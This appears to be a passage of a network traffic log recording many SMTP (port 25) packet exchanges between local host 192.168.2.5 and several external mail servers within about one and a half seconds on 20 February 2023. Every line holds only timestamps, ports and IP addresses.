Feb 20, 2023 09:50:42.555705070 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.556003094 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.569519043 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.582802057 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.582902908 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.583245993 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.610147953 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.610477924 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.613660097 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.637504101 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.637914896 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.664865017 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.665241003 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.679457903 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:42.688425064 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:42.689429045 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:42.692048073 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.692188978 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.701781034 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:42.719100952 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.719391108 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.726948977 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.737653971 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.746862888 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.747350931 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.764192104 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.767990112 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.774250984 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.774584055 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.776751995 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.799796104 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:42.801351070 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.801619053 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.807729006 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.807950020 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.809860945 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:42.826522112 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:42.826735973 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:42.828298092 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.828583002 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.834440947 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.835211992 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.851161957 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:42.852859020 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:42.855298996 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.855565071 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.857924938 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:42.861717939 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.862437963 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.865360975 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:42.882546902 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.882739067 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.887559891 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:42.888959885 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.889169931 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.909914970 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.910130024 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.914294004 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:42.915643930 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.915859938 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.919519901 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:42.937136889 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.937413931 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.942375898 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.942734003 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.964289904 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.964504957 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.969290972 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.969481945 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:42.970088005 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:42.972445965 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:42.975116014 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:42.991349936 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:42.991590977 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:42.996047974 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:42.996298075 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.005475044 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.014498949 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:43.015702009 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:43.018548965 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.018829107 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.021646023 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.022867918 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.023127079 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.045639992 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.045875072 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.049597979 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.049813032 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.053113937 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.072690964 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.073038101 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.076308966 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.076632023 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.099997044 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.100357056 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.103200912 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.103476048 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.106925964 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:43.118282080 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:43.127213955 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.127521038 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.129933119 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.130306005 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.154443026 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.154711008 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.156718969 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.156949997 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.177354097 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:43.178446054 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:43.181524038 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.181843996 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.183456898 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.183701038 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.208688974 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.208864927 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.210141897 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.210333109 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.235951900 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.236311913 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.236692905 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.236993074 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.263212919 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.263375044 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.263581038 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.263856888 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.284447908 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.284682035 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:43.284862041 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:43.290400028 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.290455103 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.290652037 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.290863037 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.298609972 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.317471981 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.317567110 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.317826033 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.318025112 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.325438023 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.328938961 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.340018988 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:43.341236115 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:43.342573881 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.344455004 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.344743013 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.344779968 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.345066071 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.371412039 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.371655941 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.371829987 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.372062922 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.374443054 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.374615908 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.398277998 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.398598909 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.399005890 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.399228096 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.401710987 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.401992083 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.425237894 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.425595999 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.426023006 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.426305056 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.428683996 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.429034948 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.452112913 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.452327967 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.452992916 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.453161001 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.455678940 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.455907106 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.463087082 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:43.479007006 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.479239941 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.479830027 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.480060101 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.482405901 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.482770920 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.502778053 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:43.504641056 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:43.505620956 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.505861044 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.507010937 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.507282972 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.509280920 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.509619951 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.532408953 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.532960892 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.534161091 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.534336090 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.536185026 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.536384106 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.559581041 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.559710979 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.561212063 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.561332941 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.563004971 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.563119888 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.574353933 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:43.586383104 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.586575031 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.588131905 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.588303089 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.589669943 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.589827061 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.613145113 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.613396883 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.615104914 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.615276098 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.616328001 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.616496086 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.640017033 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.640145063 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.642043114 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.642203093 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.643115997 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.643246889 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.666241884 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:43.666665077 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.667001009 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:43.667136908 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.669042110 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.669186115 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.669751883 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.669883013 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.693531990 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.693679094 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.696116924 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.696333885 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.696352005 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.696542978 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.720127106 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.720587969 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.723212004 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.723247051 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.723483086 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.723725080 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.747174978 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.747594118 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.750296116 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.750333071 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.750936985 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.750996113 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.769546986 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.774261951 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.774477959 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.777956963 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.778003931 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.778244972 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.778423071 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.796559095 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.796798944 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.801076889 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.801369905 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.802683115 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:43.805063009 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.805113077 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.805325985 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.805519104 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.827877045 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.827929974 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.828249931 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.828459978 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:43.829185963 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:43.831929922 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.832273006 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.832279921 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.832541943 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.847800016 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:43.854887009 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.855038881 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.859086037 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.859293938 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.859352112 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.859513998 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.863421917 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.881881952 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.882174015 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.886087894 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.886322021 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.886343956 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.886533022 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.890153885 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.898657084 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.908962965 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.909287930 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.913160086 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.913336992 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.913433075 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.913662910 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.921473980 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.935971022 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.936851025 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.940180063 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.940489054 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.940764904 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.941112995 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.951838017 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.955754995 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:43.955974102 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:43.956103086 CET	25	49708	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:43.956195116 CET	49708	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:43.963404894 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.963717937 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.967381001 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.967667103 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.967875004 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.968080997 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:43.984460115 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.990379095 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:43.990539074 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:43.990725040 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:43.991779089 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:43.994482994 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:43.994633913 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:43.994863033 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:43.995021105 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.017160892 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.017225981 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.017627954 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.021375895 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.021581888 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.021781921 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.022016048 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.044352055 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.044598103 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.048460960 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.048688889 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.048846960 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.049010992 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.071238041 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.071441889 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.076047897 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.076092958 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.076209068 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:44.076390028 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:44.098150969 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:44.098352909 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:44.103286028 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:44.103385925 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:44.103780031 CET	49710	25	192.168.2.5	142.250.27.27
